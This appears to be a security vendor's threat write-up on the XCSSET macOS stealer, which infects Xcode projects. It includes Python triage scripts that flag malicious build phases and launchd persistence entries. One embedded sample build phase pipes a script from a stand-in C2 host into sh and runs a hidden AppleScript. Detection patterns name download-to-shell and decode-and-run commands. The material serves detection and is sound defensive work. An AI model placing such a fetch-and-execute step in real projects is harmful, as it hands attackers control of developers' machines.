XCSSET is a macOS information stealer that targets developers by infecting Xcode projects and executing malicious scripts during the build process. It is designed to collect browser credentials, clipboard data, and other sensitive information, and includes persistence mechanisms to maintain access on affected devices.
Symptoms
You might observe the following artifacts associated with this threat:
- Infection of Xcode project files that results in malicious build phases or injected shell commands.
- Unexpected execution of AppleScript via osascript or run-only compiled script modules during builds.
- Presence of LaunchDaemon entries or hidden persistence components maintaining execution across system restarts.
- Altered clipboard behavior, particularly unexpected replacement of copied cryptocurrency wallet addresses.
- Evidence of exfiltration activity or unexpected network connections associated with AppleScript or obfuscated payload downloads.
Technical Breakdown
XCSSET is a sophisticated modular malware family that primarily targets developers by injecting malicious content into Xcode projects. When an infected project is built on macOS, the malware executes its payload through obfuscated shell and AppleScript modules, leveraging legitimate developer tooling to evade casual detection.
The infection chain typically consists of multiple stages, with an initial loader that fetches additional scripts and payloads from a command and control (C2) server. These downloaded components are often delivered as run-only compiled AppleScripts, which are difficult to decompile.
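To make the build-phase inspection concrete, here is an added triage script (it is not XCSSET code and not a vendor tool) that lists every shell-script build phase in a project.pbxproj and flags the behaviours described above: AppleScript via osascript, a remote script piped into a shell, decode-and-run, temp-directory staging, and launchctl use. The indicator regexes, the embedded sample project text, the host c2.invalid and the file name pbxproj_triage.py are constructed for illustration and are not observed indicators.

```python
"""Triage helper: list the shell-script build phases in an Xcode project and
flag the ones whose script shows the behaviours described in the write-up.

Added example, not XCSSET code and not part of any vendor product. It reads
the plain-text project.pbxproj inside a .xcodeproj bundle, extracts every
PBXShellScriptBuildPhase object, and applies a small set of assumed
heuristics. A hit is a reason to read the script, not a verdict.
"""
from __future__ import annotations

import re
import sys
from pathlib import Path

# Object header in project.pbxproj:   ID /* comment */ = {
HEADER_RE = re.compile(r"(?P<id>[0-9A-Za-z]+)\s*(?:/\*\s*(?P<name>.*?)\s*\*/)?\s*=\s*\{")
ISA_RE = re.compile(r"isa\s*=\s*PBXShellScriptBuildPhase\s*;")
CLOSE_RE = re.compile(r"\n\s*\};")  # end of an object (assumes no nested { } in a script phase)
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"')

# Assumed heuristics, keyed by the behaviour each one indicates.
INDICATORS = {
    "applescript-execution": re.compile(r"\bosascript\b"),
    "remote-script-to-shell": re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba|z)?sh\b"),
    "decode-and-run": re.compile(r"\bbase64\b[^|\n]*(?:-d|-D|--decode)\b"),
    "dynamic-eval": re.compile(r"\beval\b"),
    "temp-dir-staging": re.compile(r"/(?:private/)?tmp/"),
    "launchctl-use": re.compile(r"\blaunchctl\b"),
}


def unescape_pbx_string(raw: str) -> str:
    """Decode the backslash escapes pbxproj uses inside double-quoted strings."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), raw)


def extract_script_phases(pbxproj_text: str) -> list[dict]:
    """Return every PBXShellScriptBuildPhase as {id, name, script} with the script unescaped."""
    headers = list(HEADER_RE.finditer(pbxproj_text))
    phases = []
    for isa in ISA_RE.finditer(pbxproj_text):
        # The phase's own header is the last "ID = {" that opens before its isa key.
        header = max((h for h in headers if h.end() <= isa.start()), key=lambda h: h.end(), default=None)
        close = CLOSE_RE.search(pbxproj_text, isa.end())
        if header is None or close is None:
            continue
        body = pbxproj_text[header.end():close.start()]
        script = SCRIPT_RE.search(body)
        phases.append({
            "id": header.group("id"),
            "name": (header.group("name") or "").strip(),
            "script": unescape_pbx_string(script.group(1)) if script else "",
        })
    return phases


def triage_script_phases(pbxproj_text: str) -> list[dict]:
    """Attach the matched indicator names to each phase; an empty list means nothing flagged."""
    results = []
    for phase in extract_script_phases(pbxproj_text):
        hits = [name for name, rx in INDICATORS.items() if rx.search(phase["script"])]
        results.append({**phase, "indicators": hits})
    return results


# Constructed sample project: one ordinary linter phase and one injected phase.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
        archiveVersion = 1;
        objectVersion = 56;
        objects = {

/* Begin PBXShellScriptBuildPhase section */
                A1B2C3D4E5F60718293A4B5C /* SwiftLint */ = {
                        isa = PBXShellScriptBuildPhase;
                        buildActionMask = 2147483647;
                        files = (
                        );
                        runOnlyForDeploymentPostprocessing = 0;
                        shellPath = /bin/sh;
                        shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
                };
                0F0E0D0C0B0A090807060504 /* Run Script */ = {
                        isa = PBXShellScriptBuildPhase;
                        buildActionMask = 2147483647;
                        files = (
                        );
                        runOnlyForDeploymentPostprocessing = 0;
                        shellPath = /bin/sh;
                        shellScript = "curl -s http://c2.invalid/s | sh\nosascript \"/tmp/.x.scpt\"\n";
                };
/* End PBXShellScriptBuildPhase section */
        };
        rootObject = 000000000000000000000000 /* Project object */;
}
'''


def main(argv: list[str]) -> int:
    # With a path argument, triage that project.pbxproj; without one, triage the embedded sample.
    text = Path(argv[1]).read_text(encoding="utf-8", errors="replace") if len(argv) > 1 else SAMPLE_PBXPROJ
    for r in triage_script_phases(text):
        flag = "SUSPICIOUS" if r["indicators"] else "ok"
        print(f"[{flag}] {r['id']} ({r['name'] or 'unnamed'}): {', '.join(r['indicators']) or '-'}")
        for line in r["script"].splitlines():
            print("    " + line)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 pbxproj_triage.py MyApp.xcodeproj/project.pbxproj`; with no argument it triages the embedded sample and prints the injected phase as SUSPICIOUS. Legitimate build scripts also download tooling and write to temp directories, so treat a hit as a prompt to read the printed script body, and compare the project file against the copy in version control to see when the phase appeared.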
The latest variants expand XCSSET’s capabilities with new modules and behaviors. A clipboard hijacking submodule monitors the user’s clipboard for cryptocurrency wallet address patterns and replaces them with attacker-controlled addresses when a match is detected.
Another significant module introduces LaunchDaemon-based persistence. This mechanism creates a disguised persistence entry that executes malware components whenever the system launches, including when a fake application designed to resemble a legitimate macOS system component is launched.
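A defender-side check for this persistence mechanism, as an added example that is not part of the write-up or any product: it parses launchd plists with the standard library and applies assumed heuristics for the disguised-entry traits just described, namely an Apple-looking label installed outside Apple's own directories, hidden (dot-prefixed) or temp-directory paths in the command, and an AppleScript interpreter or compiled script in the program arguments. The labels, paths and the name com.apple.example.helper in the embedded samples are constructed, not observed indicators.

```python
"""Triage helper for launchd persistence entries on macOS.

Added example, not XCSSET code and not part of any vendor product. It reads
LaunchDaemon and LaunchAgent plists (XML or binary) with plistlib and applies
assumed heuristics for the persistence traits described in the write-up.
"""
from __future__ import annotations

import glob
import os
import plistlib
from pathlib import Path

# Where third-party (and attacker-installed) launchd items live.
THIRD_PARTY_LAUNCH_DIRS = (
    "/Library/LaunchDaemons",
    "/Library/LaunchAgents",
    os.path.expanduser("~/Library/LaunchAgents"),
)
# Apple's own daemons and agents ship here; a com.apple.* label elsewhere deserves a look.
APPLE_LAUNCH_DIRS = ("/System/Library/LaunchDaemons", "/System/Library/LaunchAgents")


def launch_command(plist: dict) -> list[str]:
    """launchd accepts Program, ProgramArguments, or both; return the combined command line."""
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    if plist.get("Program"):
        args.insert(0, str(plist["Program"]))
    return args


def triage_launch_item(plist_bytes: bytes, plist_path: str) -> dict:
    """Parse one plist and return its label, command, and the names of matched heuristics."""
    plist = plistlib.loads(plist_bytes)
    label = str(plist.get("Label", ""))
    cmd = launch_command(plist)
    hits = []
    if label.startswith("com.apple.") and not plist_path.startswith(APPLE_LAUNCH_DIRS):
        hits.append("apple-label-outside-system-dir")
    if any(p.startswith(".") and p not in (".", "..") for tok in cmd for p in tok.split("/")):
        hits.append("hidden-path-component")
    if any("/tmp/" in tok or "/var/tmp/" in tok for tok in cmd):
        hits.append("temp-dir-path")
    if any(Path(tok).name == "osascript" or tok.endswith(".scpt") for tok in cmd):
        hits.append("applescript-execution")
    # A missing executable is not malicious by itself, but a dangling entry is worth explaining.
    program_present = bool(cmd) and os.path.exists(cmd[0])
    return {"path": plist_path, "label": label, "command": cmd,
            "program_present": program_present, "indicators": hits}


def scan_launch_dirs(dirs=THIRD_PARTY_LAUNCH_DIRS) -> list[dict]:
    """Triage every plist in the given directories; unreadable files are reported, not skipped."""
    results = []
    for d in dirs:
        for path in sorted(glob.glob(os.path.join(d, "*.plist"))):
            try:
                results.append(triage_launch_item(Path(path).read_bytes(), path))
            except Exception as exc:  # OSError or any plistlib/XML parse error
                results.append({"path": path, "label": "", "command": [],
                                "program_present": False, "indicators": [f"unparseable: {exc}"]})
    return results


# Constructed samples (not real indicators): an ordinary updater, a look-alike
# entry running a compiled AppleScript from a hidden folder, and a temp-dir program.
SAMPLE_ITEMS = {
    "/Library/LaunchDaemons/com.example.updater.plist": plistlib.dumps({
        "Label": "com.example.updater",
        "ProgramArguments": ["/Library/Application Support/Example/updater", "--check"],
        "RunAtLoad": True,
    }),
    "/Library/LaunchDaemons/com.apple.example.helper.plist": plistlib.dumps({
        "Label": "com.apple.example.helper",
        "ProgramArguments": ["/usr/bin/osascript", "/Library/Application Support/.helper/main.scpt"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
    "/Library/LaunchAgents/com.example.cache.plist": plistlib.dumps({
        "Label": "com.example.cache",
        "Program": "/private/tmp/.cache/run",
        "RunAtLoad": True,
    }),
}


def triage_samples() -> list[dict]:
    return [triage_launch_item(data, path) for path, data in SAMPLE_ITEMS.items()]


if __name__ == "__main__":
    import sys
    # Pass --live to scan the real launchd directories; otherwise the embedded samples are used.
    items = scan_launch_dirs() if "--live" in sys.argv[1:] else triage_samples()
    for r in items:
        flag = "SUSPICIOUS" if r["indicators"] else "ok"
        print(f"[{flag}] {r['path']}\n    label={r['label']!r} present={r['program_present']}\n"
              f"    cmd={' '.join(r['command'])}\n    indicators={', '.join(r['indicators']) or '-'}")
```

Running the script with `--live` walks the system and user launchd directories and prints each entry with its matched heuristics. Every flagged item should be checked against what installed it (package receipts, the app it claims to belong to, the executable's code signature), and the corresponding Xcode projects on the same machine inspected, since the two mechanisms are described as arriving together.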
XCSSET also includes stealer modules that target multiple browsers. A compiled binary, often derived from modified open-source tools like HackBrowserData, is downloaded and executed to extract saved credentials, cookies, history, and autofill information from browsers such as Firefox.
Throughout its execution, XCSSET uses advanced obfuscation and encryption techniques, including randomized encoding and obfuscated module names, to make static analysis and detection more difficult.
Next Steps
Iru Endpoint Detection & Response (EDR) can detect anomalous behavior associated with XCSSET, including obfuscated script execution, unauthorized clipboard manipulation, and modification of LaunchDaemon entries when file monitoring and behavioral protections are enabled.
If XCSSET activity is suspected on a device, carefully inspect Xcode project files for unauthorized build phase modifications or injected commands, and remove any suspicious components. Investigate any unusual persistent processes, LaunchDaemon plists, or automatic script execution triggers. Rotate credentials stored in browsers and ensure that sensitive wallet addresses and tokens have not been compromised.
In the future, only open and build Xcode projects from trusted and verified sources. Be cautious when handling sensitive data in the clipboard, and verify that pasted content is accurate before use. Keep macOS and all development tools updated to the latest security releases to reduce the threat surface.
MonetaStealer
MonetaStealer is a macOS-focused information stealer that targets browser data, cryptocurrency wallets, Wi-Fi credentials, and more.
Banshee
Banshee is a sophisticated macOS infostealer that poses a significant threat to Apple users. It is designed to exfiltrate a wide range of sensitive information, including system data, login credentials, and cryptocurrency wallets.
Poseidon
Poseidon (RodrigoStealer) is an information stealer targeting macOS users, masquerading as legitimate applications such as the Arc browser. It is designed to exfiltrate sensitive data, including system information, browser credentials, cryptocurrency wallets, and documents. It has been associated with Russian-speaking cybercriminal communities and is actively distributed through phishing campaigns and compromised websites.